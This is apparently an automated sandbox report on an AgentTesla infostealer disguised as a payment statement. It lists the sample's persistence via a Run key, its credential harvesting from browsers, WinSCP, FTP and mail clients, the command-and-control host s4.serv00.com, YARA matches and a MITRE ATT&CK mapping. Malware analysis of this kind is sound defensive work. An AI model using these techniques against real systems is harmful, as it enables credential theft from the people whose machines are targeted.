Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7320, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7320, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7320, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Deobfuscate/Decode Files or Information	31 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	31 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Statement JULY #U007e SEP 2024 USD 19,055.00.exe	58%	ReversingLabs	Win32.Trojan.GenSteal
Statement JULY #U007e SEP 2024 USD 19,055.00.exe	66%	Virustotal		Browse
Statement JULY #U007e SEP 2024 USD 19,055.00.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	58%	ReversingLabs	Win32.Trojan.GenSteal

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
s4.serv00.com	213.189.52.181	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.typography.netD	adobe.exe, 00000009.00000002.1892432130.0000000006F62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.mic	adobe.exe, 00000009.00000002.1892047750.0000000005E50000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com~	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1654989039.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	adobe.exe, 00000009.00000002.1892432130.0000000006F62000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1889045993.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	adobe.exe, 00000005.00000002.1801839278.0000000007592000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://en.wkH	adobe.exe, 00000005.00000002.1799930314.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.ipify.org/t	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://s4.serv00.com	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1658281450.0000000006C32000.00000004.00000800.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1654989039.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000000.00000002.1658168989.0000000005B3B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.189.52.181	s4.serv00.com	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545102
Start date and time:	2024-10-30 05:28:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Statement JULY #U007e SEP 2024 USD 19,055.00.exe renamed because original name is a hash value
Original Sample Name:	Statement JULY ~ SEP 2024 USD 19,055.00.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 262 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:28:55	API Interceptor	8169608x Sleep call for process: Statement JULY #U007e SEP 2024 USD 19,055.00.exe modified
00:29:09	API Interceptor	6740986x Sleep call for process: adobe.exe modified
04:28:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
04:29:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
213.189.52.181	Arrival Notice - BL 713410220035.PDF.exe	Get hash	malicious	AgentTesla	Browse
	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s4.serv00.com	Arrival Notice - BL 713410220035.PDF.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	213.189.52.181
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
api.ipify.org	EVER ABILITY V66 PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MV. NORDRHONE VSL's PARTICULARS.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MUM - VESSEL'S PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Bill_Of _Lading.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Shipping documents 00029399400059.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	z20SWIFT_MT103_Payment_552016_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	Remittance Receipt.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Win64.Malware-gen.4046.15809.exe	Get hash	malicious	EICAR	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ECO-ATMAN-PLECO-ATMAN-PL	9zldYT23H2.elf	Get hash	malicious	Mirai, Gafgyt	Browse	31.186.82.2
	RicevutaPagamento_115538206.dat	Get hash	malicious	Unknown	Browse	128.204.223.111
	http://bdvenlineabanven.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://ahksoch.serv00.net/x92gamy6wh/	Get hash	malicious	HTMLPhisher	Browse	128.204.218.63
	http://intesa-it.serv00.net/it/conto/	Get hash	malicious	Unknown	Browse	85.194.246.69
	https://spofity.serv00.net/spotify/auth/login.php	Get hash	malicious	Unknown	Browse	128.204.223.117
	http://www.viundodal.serv00.net/	Get hash	malicious	Unknown	Browse	128.204.218.63
	http://nickle-support.serv00.net/redirect.html	Get hash	malicious	Unknown	Browse	128.204.218.63
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	0JLWNg4Sz1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	XhYAqi0wi5.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.97.3
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	z1MRforsteamDRUM-A1_pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5	Get hash	malicious	Unknown	Browse	172.67.132.160
